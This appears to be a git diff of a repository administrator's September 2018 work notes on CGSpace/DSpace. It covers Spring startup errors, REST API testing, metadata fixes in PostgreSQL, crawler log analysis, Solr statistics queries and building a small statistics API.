java.lang.RuntimeException: Failure during filter init: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations: {@org.springframework.beans.factory.annotation.Autowired(required=true)}
at org.dspace.servicemanager.servlet.DSpaceKernelServletContextListener.contextInitialized(DSpaceKernelServletContextListener.java:92)
at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4776)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5240)
@ -139,7 +139,7 @@ I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'conversionService' defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2' of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property 'converters' with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2': Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;conversionService&#39; defined in file [/home/dspacetest.cgiar.org/config/spring/xmlui/spring-dspace-addon-cua-services.xml]: Cannot create inner bean &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39; of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter] while setting bean property &#39;converters&#39; with key [1]; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name &#39;com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter#4c5d5a2&#39;: Injection of autowired dependencies failed; nested exception is org.springframework.beans.factory.BeanCreationException: Could not autowire field: private com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$ColumnsConverter.filterConverter; nested exception is org.springframework.beans.factory.NoSuchBeanDefinitionException: No matching bean of type [com.atmire.app.xmlui.aspect.statistics.mostpopular.MostPopularConfig$FilterConverter] found for dependency: expected at least 1 bean which qualifies as autowire candidate for this dependency. Dependency annotations:
</code></pre><ul>
<li>Full log here: <a href="https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2">https://gist.github.com/alanorth/1e4ae567b853fea9d9dbf1a030ecd8c2</a></li>
<li>XMLUI fails to load, but the REST, SOLR, JSPUI, etc work</li>
@ -184,20 +184,20 @@ Caused by: java.lang.RuntimeException: Failed to startup the DSpace Service Mana
<li>Playing with <a href="https://github.com/eykhagen/strest">strest</a> to test the DSpace REST API programmatically</li>
<li>For example, given this <code>test.yaml</code>:</li>
</ul>
<pre><code>version: 1
<pre tabindex="0"><code>version: 1
requests:
test:
method: GET
url: https://dspacetest.cgiar.org/rest/test
validate:
raw: &quot;REST api is running.&quot;
raw: &#34;REST api is running.&#34;
login:
url: https://dspacetest.cgiar.org/rest/login
method: POST
data:
json: {&quot;email&quot;:&quot;test@dspace&quot;,&quot;password&quot;:&quot;thepass&quot;}
json: {&#34;email&#34;:&#34;test@dspace&#34;,&#34;password&#34;:&#34;thepass&#34;}
status:
url: https://dspacetest.cgiar.org/rest/status
@ -217,27 +217,27 @@ requests:
<li>We could eventually use this to test sanity of the API for creating collections etc</li>
<li>A user is getting an error in her workflow:</li>
</ul>
<pre><code>2018-09-10 07:26:35,551 ERROR org.dspace.submit.step.CompleteStep @ Caught exception in submission step:
<pre tabindex="0"><code>2018-09-10 07:26:35,551 ERROR org.dspace.submit.step.CompleteStep @ Caught exception in submission step:
org.dspace.authorize.AuthorizeException: Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:2 by user 3819
</code></pre><ul>
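<li>Assuming the DSpace 5 schema, one way to check whether user 3819 is actually in that collection&rsquo;s step 1 workflow group would be something like this (a sketch, not what I ran):</li>
</ul>
<pre><code>dspace=# select workflow_step_1 from collection where collection_id=2;
dspace=# select * from epersongroup2eperson where eperson_group_id=&lt;group id from above&gt; and eperson_id=3819;
</code></pre><ul>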
<li>Seems to be during submit step, because it&rsquo;s workflow step 1&hellip;?</li>
<li>Move some top-level CRP communities to be below the new <a href="https://cgspace.cgiar.org/handle/10568/97114">CGIAR Research Programs and Platforms</a> community:</li>
</ul>
<pre><code>$ dspace community-filiator --set -p 10568/97114 -c 10568/51670
<pre tabindex="0"><code>$ dspace community-filiator --set -p 10568/97114 -c 10568/51670
$ dspace community-filiator --set -p 10568/97114 -c 10568/35409
$ dspace community-filiator --set -p 10568/97114 -c 10568/3112
</code></pre><ul>
<li>Valerio contacted me to point out some issues with metadata on CGSpace, which I corrected in PostgreSQL:</li>
</ul>
<pre><code>update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI Juornal';
<pre tabindex="0"><code>update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI Juornal&#39;;
UPDATE 1
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI journal';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI journal&#39;;
UPDATE 23
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='YES';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;YES&#39;;
UPDATE 1
delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value='NO';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;NO&#39;;
DELETE 17
update metadatavalue set text_value='ISI Journal' where resource_type_id=2 and metadata_field_id=226 and text_value='ISI';
update metadatavalue set text_value=&#39;ISI Journal&#39; where resource_type_id=2 and metadata_field_id=226 and text_value=&#39;ISI&#39;;
UPDATE 15
</code></pre><ul>
<li>Start working on adding metadata for access and usage rights that we started earlier in 2018 (and also in 2017)</li>
@ -246,7 +246,7 @@ UPDATE 15
<li>Linode said that CGSpace (linode18) had a high CPU load earlier today</li>
<li>When I looked, I see it&rsquo;s the same Russian IP that I noticed last month:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;10/Sep/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;10/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1459 157.55.39.202
1579 95.108.181.88
1615 157.55.39.147
@ -260,17 +260,17 @@ UPDATE 15
</code></pre><ul>
<li>And this bot is still creating more Tomcat sessions than Nginx requests (WTF?):</li>
</ul>
<pre><code># grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2018-09-10
<pre tabindex="0"><code># grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2018-09-10
14133
</code></pre><ul>
<li>The user agent is still the same:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
<pre tabindex="0"><code>Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)
</code></pre><ul>
<li>I added <code>.*crawl.*</code> to the Tomcat Crawler Session Manager Valve, so I&rsquo;m not sure why the bot is creating so many sessions&hellip;</li>
<li>I just tested that user agent on CGSpace and it <em>does not</em> create a new session:</li>
</ul>
<pre><code>$ http --print Hh https://cgspace.cgiar.org 'User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'
<pre tabindex="0"><code>$ http --print Hh https://cgspace.cgiar.org &#39;User-Agent:Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#39;
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
@ -300,7 +300,7 @@ X-XSS-Protection: 1; mode=block
<li>Merge AReS explorer changes to nginx config and deploy on CGSpace so CodeObia can start testing more</li>
<li>Re-create my local Docker container for PostgreSQL data, but using a volume for the database data:</li>
</ul>
<pre><code>$ sudo docker volume create --name dspacetest_data
<pre tabindex="0"><code>$ sudo docker volume create --name dspacetest_data
$ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
</code></pre><ul>
<li>Sisay is still having problems with the controlled vocabulary for top authors</li>
@ -319,7 +319,7 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
<li>Linode says that CGSpace (linode18) has had high CPU for the past two hours</li>
<li>The top IP addresses today are:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;13/Sep/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;13/Sep/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
32 46.229.161.131
38 104.198.9.108
39 66.249.64.91
@ -333,9 +333,9 @@ $ sudo docker run --name dspacedb -v dspacetest_data:/var/lib/postgresql/data -e
</code></pre><ul>
<li>And the top two addresses seem to be re-using their Tomcat sessions properly:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92' dspace.log.2018-09-13 | sort | uniq
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=70.32.83.92&#39; dspace.log.2018-09-13 | sort | uniq
7
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-13 | sort | uniq
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77&#39; dspace.log.2018-09-13 | sort | uniq
2
</code></pre><ul>
<li>So I&rsquo;m not sure what&rsquo;s going on</li>
@ -343,7 +343,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>I said no, but that we might be able to piggyback on the Atmire statlet REST API</li>
<li>For example, when you expand the &ldquo;statlet&rdquo; at the bottom of an item like <a href="https://cgspace.cgiar.org/handle/10568/97103">10568/97103</a> you can see the following request in the browser console:</li>
</ul>
<pre><code>https://cgspace.cgiar.org/rest/statlets?handle=10568/97103
<pre tabindex="0"><code>https://cgspace.cgiar.org/rest/statlets?handle=10568/97103
</code></pre><ul>
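<li>Fetching that directly with httpie, for example:</li>
</ul>
<pre><code>$ http -b 'https://cgspace.cgiar.org/rest/statlets?handle=10568/97103'
</code></pre><ul>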
<li>That JSON file has the total page views and item downloads for the item&hellip;</li>
<li>Abenet forwarded a request by CIP that item thumbnails be included in RSS feeds</li>
@ -397,12 +397,12 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>There are some example queries on the <a href="https://wiki.lyrasis.org/display/DSPACE/Solr">DSpace Solr wiki</a></li>
<li>For example, this query returns 1655 rows for item <a href="https://cgspace.cgiar.org/handle/10568/10630">10568/10630</a>:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&#39;
</code></pre><ul>
<li>The id in the Solr query is the item&rsquo;s database id (get it from the REST API or something)</li>
<li>Next, I adapted a query to get the downloads and it shows 889, which is similar to the number Atmire&rsquo;s statlet shows, though the query logic here is confusing:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-(bundleName:[*+TO+*]-bundleName:ORIGINAL)&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
</code></pre><ul>
<li>According to the <a href="https://wiki.apache.org/solr/SolrQuerySyntax">SolrQuerySyntax</a> page on the Apache wiki, the <code>[* TO *]</code> syntax just selects a range (in this case all values for a field)</li>
<li>So it seems to be:
@ -413,15 +413,15 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
</li>
<li>What the shit, I think I&rsquo;m right: the simplified logic in <em>this</em> query returns the same 889:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=-(statistics_type:[*+TO+*]+-statistics_type:view)&#39;
</code></pre><ul>
<li>And if I simplify the <code>statistics_type</code> logic the same way, it still returns the same 889!</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
</code></pre><ul>
<li>As for item views, I suppose that&rsquo;s just the same query, minus the <code>bundleName:ORIGINAL</code>:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view'
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?indent=on&amp;rows=0&amp;q=type:0+owningItem:11576&amp;fq=isBot:false&amp;fq=-bundleName:ORIGINAL&amp;fq=statistics_type:view&#39;
</code></pre><ul>
<li>That one returns 766, which is exactly 1655 minus 889&hellip;</li>
<li>Also, Solr&rsquo;s <code>fq</code> is similar to the regular <code>q</code> query parameter, but it is considered for the Solr query cache so it should be faster for multiple queries</li>
@ -432,18 +432,18 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>It uses the Python-based <a href="https://falcon.readthedocs.io">Falcon</a> web framework and talks to Solr directly using the <a href="https://github.com/moonlitesolutions/SolrClient">SolrClient</a> library (which seems to have issues in Python 3.7 currently)</li>
<li>After deploying on DSpace Test I can then get the stats for an item using its ID:</li>
</ul>
<pre><code>$ http -b 'https://dspacetest.cgiar.org/rest/statistics/item?id=110988'
<pre tabindex="0"><code>$ http -b &#39;https://dspacetest.cgiar.org/rest/statistics/item?id=110988&#39;
{
&quot;downloads&quot;: 2,
&quot;id&quot;: 110988,
&quot;views&quot;: 15
&#34;downloads&#34;: 2,
&#34;id&#34;: 110988,
&#34;views&#34;: 15
}
</code></pre><ul>
<li>The numbers are different than those that come from Atmire&rsquo;s statlets for some reason, but as I&rsquo;m querying Solr directly, I have no idea where their numbers come from!</li>
<li>Moayad from CodeObia asked if I could make the API able to paginate over all items, for example: /statistics?limit=100&amp;page=1</li>
<li>Getting all the item IDs from PostgreSQL is certainly easy:</li>
</ul>
<pre><code>dspace=# select item_id from item where in_archive is True and withdrawn is False and discoverable is True;
<pre tabindex="0"><code>dspace=# select item_id from item where in_archive is True and withdrawn is False and discoverable is True;
</code></pre><ul>
<li>The rest of the Falcon tooling will be more difficult&hellip;</li>
</ul>
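<ul>
<li>Just to sketch the idea (hypothetical names, not the final code), a paginated Falcon resource might look something like this:</li>
</ul>
<pre><code>import falcon

class AllItemsResource:
    def on_get(self, req, resp):
        limit = req.get_param_as_int('limit') or 100
        page = req.get_param_as_int('page') or 0
        offset = limit * page
        # here we would select limit item ids starting at offset from the database
        # and then look up each one's views and downloads in Solr
        resp.media = {'limit': limit, 'page': page, 'statistics': []}

api = falcon.API()
api.add_route('/statistics', AllItemsResource())
</code></pre>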
@ -457,11 +457,11 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>Contact Atmire to ask how we can buy more credits for future development (<a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=644">#644</a>)</li>
<li>I researched the Solr <code>filterCache</code> size and I found out that the formula for calculating the potential memory use of <strong>each entry</strong> in the cache is:</li>
</ul>
<pre><code>((maxDoc/8) + 128) * (size_defined_in_solrconfig.xml)
<pre tabindex="0"><code>((maxDoc/8) + 128) * (size_defined_in_solrconfig.xml)
</code></pre><ul>
<li>Which means that, for our statistics core with <em>149 million</em> documents, each entry in our <code>filterCache</code> would use 8.9 GB!</li>
</ul>
<pre><code>((149374568/8) + 128) * 512 = 9560037888 bytes (8.9 GB)
<pre tabindex="0"><code>((149374568/8) + 128) * 512 = 9560037888 bytes (8.9 GB)
</code></pre><ul>
<li>So I think we can forget about tuning this for now!</li>
<li><a href="http://lucene.472066.n3.nabble.com/Calculating-filterCache-size-td4142526.html">Discussion on the mailing list about <code>filterCache</code> size</a></li>
@ -495,7 +495,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=50.116.102.77' dspace.log.2018-09-
<li>Trying to figure out how to get item views and downloads from SQLite in a join</li>
<li>It appears SQLite doesn&rsquo;t support <code>FULL OUTER JOIN</code> so some people on StackOverflow have emulated it with <code>LEFT JOIN</code> and <code>UNION</code>:</li>
</ul>
<pre><code>&gt; SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemviews views
<pre tabindex="0"><code>&gt; SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemviews views
LEFT JOIN itemdownloads downloads USING(id)
UNION ALL
SELECT views.views, views.id, downloads.downloads, downloads.id FROM itemdownloads downloads
@ -505,7 +505,7 @@ WHERE views.id IS NULL;
<li>This &ldquo;works&rdquo; but the resulting rows are kinda messy so I&rsquo;d have to do extra logic in Python</li>
<li>Maybe we can use one &ldquo;items&rdquo; table with default values and UPSERT (aka insert&hellip; on conflict &hellip; do update):</li>
</ul>
<pre><code>sqlite&gt; CREATE TABLE items(id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DEFAULT 0);
<pre tabindex="0"><code>sqlite&gt; CREATE TABLE items(id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DEFAULT 0);
sqlite&gt; INSERT INTO items(id, views) VALUES(0, 52);
sqlite&gt; INSERT INTO items(id, downloads) VALUES(1, 171);
sqlite&gt; INSERT INTO items(id, downloads) VALUES(1, 176) ON CONFLICT(id) DO UPDATE SET downloads=176;
@ -521,7 +521,7 @@ sqlite&gt; INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE S
<li>Ok this is hilarious, I manually downloaded the <a href="https://packages.ubuntu.com/cosmic/libsqlite3-0">libsqlite3 3.24.0 deb from Ubuntu 18.10 &ldquo;cosmic&rdquo;</a> and installed it in Ubuntu 16.04 and now the Python <code>indexer.py</code> works</li>
<li>This is definitely a dirty hack, but the list of packages we use that depend on <code>libsqlite3-0</code> in Ubuntu 16.04 is actually pretty short:</li>
</ul>
<pre><code># apt-cache rdepends --installed libsqlite3-0 | sort | uniq
<pre tabindex="0"><code># apt-cache rdepends --installed libsqlite3-0 | sort | uniq
gnupg2
libkrb5-26-heimdal
libnss3
@ -530,10 +530,10 @@ sqlite&gt; INSERT INTO items(id, views) VALUES(0, 7) ON CONFLICT(id) DO UPDATE S
</code></pre><ul>
<li>I wonder if I could work around this by detecting the SQLite library version, for example on Ubuntu 16.04 after I replaced the library:</li>
</ul>
<pre><code># python3
<pre tabindex="0"><code># python3
Python 3.5.2 (default, Nov 23 2017, 16:37:01)
[GCC 5.4.0 20160609] on linux
Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.
Type &#34;help&#34;, &#34;copyright&#34;, &#34;credits&#34; or &#34;license&#34; for more information.
&gt;&gt;&gt; import sqlite3
&gt;&gt;&gt; print(sqlite3.sqlite_version)
3.24.0
@ -542,7 +542,7 @@ Type &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;licen
<li>I changed the syntax of the SQLite stuff and PostgreSQL is working flawlessly with psycopg2&hellip; hmmm.</li>
<li>For reference, creating a PostgreSQL database for testing this locally (though <code>indexer.py</code> will create the table):</li>
</ul>
<pre><code>$ createdb -h localhost -U postgres -O dspacestatistics --encoding=UNICODE dspacestatistics
<pre tabindex="0"><code>$ createdb -h localhost -U postgres -O dspacestatistics --encoding=UNICODE dspacestatistics
$ createuser -h localhost -U postgres --pwprompt dspacestatistics
$ psql -h localhost -U postgres dspacestatistics
dspacestatistics=&gt; CREATE TABLE IF NOT EXISTS items
@ -558,7 +558,7 @@ dspacestatistics-&gt; (id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DE
<li>DSpace Test currently has about 2,000,000 documents with <code>isBot:true</code> in its Solr statistics core, and the size on disk is 2GB (it&rsquo;s not much, but I have to test this somewhere!)</li>
<li>According to the <a href="https://wiki.lyrasis.org/display/DSDOC5x/SOLR+Statistics+Maintenance">DSpace 5.x Solr documentation</a> I can use <code>dspace stats-util -f</code>, so let&rsquo;s try it:</li>
</ul>
<pre><code>$ dspace stats-util -f
<pre tabindex="0"><code>$ dspace stats-util -f
</code></pre><ul>
<li>The command comes back after a few seconds and I still see 2,000,000 documents in the statistics core with <code>isBot:true</code></li>
<li>I was just writing a message to the dspace-tech mailing list and then I decided to check the number of bot view events on DSpace Test again, and now it&rsquo;s 201 instead of 2,000,000, and the statistics core is only 30MB!</li>
@ -576,11 +576,11 @@ dspacestatistics-&gt; (id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DE
<li>According to the <a href="https://support.google.com/webmasters/answer/80553">Googlebot FAQ</a> the domain name in the reverse DNS lookup should contain either <code>googlebot.com</code> or <code>google.com</code></li>
<li>In Solr this appears to be an appropriate query that I can maybe use later (returns 81,000 documents):</li>
</ul>
<pre><code>*:* AND (dns:*googlebot.com. OR dns:*google.com.) AND isBot:false
<pre tabindex="0"><code>*:* AND (dns:*googlebot.com. OR dns:*google.com.) AND isBot:false
</code></pre><ul>
<li>I translate that into a delete command using the <code>/update</code> handler:</li>
</ul>
<pre><code>http://localhost:8081/solr/statistics/update?commit=true&amp;stream.body=&lt;delete&gt;&lt;query&gt;*:*+AND+(dns:*googlebot.com.+OR+dns:*google.com.)+AND+isBot:false&lt;/query&gt;&lt;/delete&gt;
<pre tabindex="0"><code>http://localhost:8081/solr/statistics/update?commit=true&amp;stream.body=&lt;delete&gt;&lt;query&gt;*:*+AND+(dns:*googlebot.com.+OR+dns:*google.com.)+AND+isBot:false&lt;/query&gt;&lt;/delete&gt;
</code></pre><ul>
<li>And magically all those 81,000 documents are gone!</li>
<li>After a few hours the Solr statistics core is down to 44GB on CGSpace!</li>
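<ul>
<li>For future reference, the reverse-and-forward DNS check that the Googlebot FAQ above describes is easy to do from Python with the standard library (just a sketch of the idea, not something I ran against the logs):</li>
</ul>
<pre><code>import socket

def is_googlebot(ip):
    # Reverse lookup: the hostname should be under googlebot.com or google.com
    try:
        hostname = socket.gethostbyaddr(ip)[0]
    except socket.herror:
        return False
    if not hostname.endswith(('.googlebot.com', '.google.com')):
        return False
    # Forward-confirm: the hostname must resolve back to the same IP
    try:
        return ip in socket.gethostbyname_ex(hostname)[2]
    except socket.gaierror:
        return False

print(is_googlebot('66.249.64.95'))  # one of the IPs seen in the nginx logs above
</code></pre>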
@ -588,7 +588,7 @@ dspacestatistics-&gt; (id INT PRIMARY KEY, views INT DEFAULT 0, downloads INT DE
<li>Basically, it turns out that using <code>facet.mincount=1</code> is really beneficial for me because it reduces the size of the Solr result set, reduces the amount of data we need to ingest into PostgreSQL, and the API returns HTTP 404 Not Found for items without views or downloads anyways</li>
<li>I deployed the new version on CGSpace and now it looks pretty good!</li>
</ul>
<pre><code>Indexing item views (page 28 of 753)
<pre tabindex="0"><code>Indexing item views (page 28 of 753)
...
Indexing item downloads (page 260 of 260)
</code></pre><ul>
@ -606,12 +606,12 @@ Indexing item downloads (page 260 of 260)
<li>I will have to keep an eye on that over the next few weeks to see if things stay as they are</li>
<li>I did a batch replacement of the access rights with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script on DSpace Test:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p 'fuuu' -f cg.identifier.status -t correct -m 206
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/fix-access-status.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.identifier.status -t correct -m 206
</code></pre><ul>
<li>This changes &ldquo;Open Access&rdquo; to &ldquo;Unrestricted Access&rdquo; and &ldquo;Limited Access&rdquo; to &ldquo;Restricted Access&rdquo;</li>
<li>After that I did a full Discovery reindex:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
real 77m3.755s
user 7m39.785s
@ -629,7 +629,7 @@ sys 2m18.485s
<li>Linode emailed to say that CGSpace&rsquo;s (linode19) CPU load was high for a few hours last night</li>
<li>Looking in the nginx logs around that time I see some new IPs that look like they are harvesting things:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;26/Sep/2018:(19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;26/Sep/2018:(19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
295 34.218.226.147
296 66.249.64.95
350 157.55.39.185
@ -645,9 +645,9 @@ sys 2m18.485s
<li><code>68.6.87.12</code> is on Cox Communications in the US (?)</li>
<li>These hosts are not using proper user agents and are not re-using their Tomcat sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-09-26 | sort | uniq
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-09-26 | sort | uniq
5423
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26 | sort | uniq
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12&#39; dspace.log.2018-09-26 | sort | uniq
758
</code></pre><ul>
<li>I will add their IPs to the list of bad bots in nginx so we can add a &ldquo;bot&rdquo; user agent to them and let Tomcat&rsquo;s Crawler Session Manager Valve handle them</li>
@ -659,12 +659,12 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=68.6.87.12' dspace.log.2018-09-26
